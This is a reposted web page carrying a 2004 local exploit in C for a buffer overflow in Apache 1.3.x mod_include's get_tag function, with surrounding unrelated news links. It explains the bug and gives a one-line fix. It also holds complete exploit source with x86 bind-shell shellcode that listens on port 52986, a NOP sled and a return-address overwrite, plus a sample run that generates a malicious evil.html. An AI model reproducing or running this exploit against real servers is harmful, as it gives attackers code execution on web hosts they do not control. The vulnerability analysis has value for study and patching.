分享
 
 
 

Apache mod_include_exp

王朝system·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

/*********************************************************************************

local exploit for mod_include of apache 1.3.x *

written by xCrZx /18.10.2004/ *

bug found by xCrZx /18.10.2004/ *

*

y0das old shao lin techniq ownz u :) remember my words *

http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3 *

*

Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike) *

*********************************************************************************/

/*********************************************************************************

Technical Details: *

*

there is an overflow in get_tag function: *

*

static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *

{ *

... *

term = c; *

while (1) { *

GET_CHAR(in, c, NULL, p); *

[1] if (t - tag == tagbuf_len) { *

*t = '\0'; *

return NULL; *

} *

// Want to accept \" as a valid character within a string. // *

if (c == '\\') { *

[2] *(t++) = c; // Add backslash // *

GET_CHAR(in, c, NULL, p); *

if (c == term) { // Only if // *

[3] *(--t) = c; // Replace backslash ONLY for terminator // *

} *

} *

else if (c == term) { *

break; *

} *

[4] *(t++) = c; *

} *

*t = '\0'; *

... *

*

as we can see there is a [1] check to determine the end of tag buffer *

but this check can be skiped when [2] & [4] conditions will be occured *

at the same time without [3] condition. *

*

So attacker can create malicious file to overflow static buffer, on *

which tag points out and execute arbitrary code with privilegies of *

httpd child process. *

*

Fix: *

[1*] if (t - tag >= tagbuf_len-1) { *

*

Notes: To activate mod_include you need write "XBitHack on" in httpd.conf *

*

*********************************************************************************/

/*********************************************************************************

Example of work: *

*

[root@blacksand htdocs]# make 85mod_include *

cc 85mod_include.c -o 85mod_include *

[root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html *

[root@blacksand htdocs]# chmod +x evil.html *

[root@blacksand htdocs]# netstat -na|grep 52986 *

[root@blacksand htdocs]# telnet localhost 8080 *

Trying 127.0.0.1... *

Connected to localhost. *

Escape character is '^]'. *

GET /evil.html HTTP/1.0 *

^] *

telnet> q *

Connection closed. *

[root@blacksand htdocs]# netstat -na|grep 52986 *

tcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN *

[root@blacksand htdocs]# *

*********************************************************************************/

/*********************************************************************************

Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always *

*********************************************************************************/

/*********************************************************************************

Personal hello to my parents :) *

*********************************************************************************/

/*********************************************************************************

Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz *

*********************************************************************************/

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>

#define EVILBUF 8202

#define HTMLTEXT 1000

#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"

#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"

int main(int argc, char **argv) {

char html[EVILBUF+HTMLTEXT];

char evilbuf[EVILBUF+1];

//can be changed

char shellcode[] =

// bind shell on 52986 port

"\x31\xc0"

"\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"

"\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"

"\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"

"\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"

"\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"

"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

//execve /tmp/sh <- your own program

/*

"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"

"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"

"\xc0\x88\x43\x07\x89\x5b\x08\x89"

"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"

"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"

"/tmp/sh";

*/

char NOP[] = "\x90\x40"; // special nops ;)

char evilpad[] = "\\CRZCRZCRZCRZC"; // trick ;)

int padding,xpad=0;

int i,fd;

long ret=0xbfff8688;

if(argc>1) ret=strtoul(argv[1],0,16);

else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exit(0); }

padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);

while(1) {

if(padding%2==0) { padding/=2; break;}

else {padding--;xpad++;}

}

memset(html,0x0,sizeof html);

memset(evilbuf,0x0,sizeof evilbuf);

for(i=0;i<padding;i++)

memcpy(evilbuf+strlen(evilbuf),&NOP,2);

for(i=0;i<xpad;i++)

memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);

memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);

memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);

*(long*)&evilbuf[strlen(evilbuf)]=ret;

sprintf(html,HTML_FORMAT,evilbuf);

printf("%s",html);

return 0;

}

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有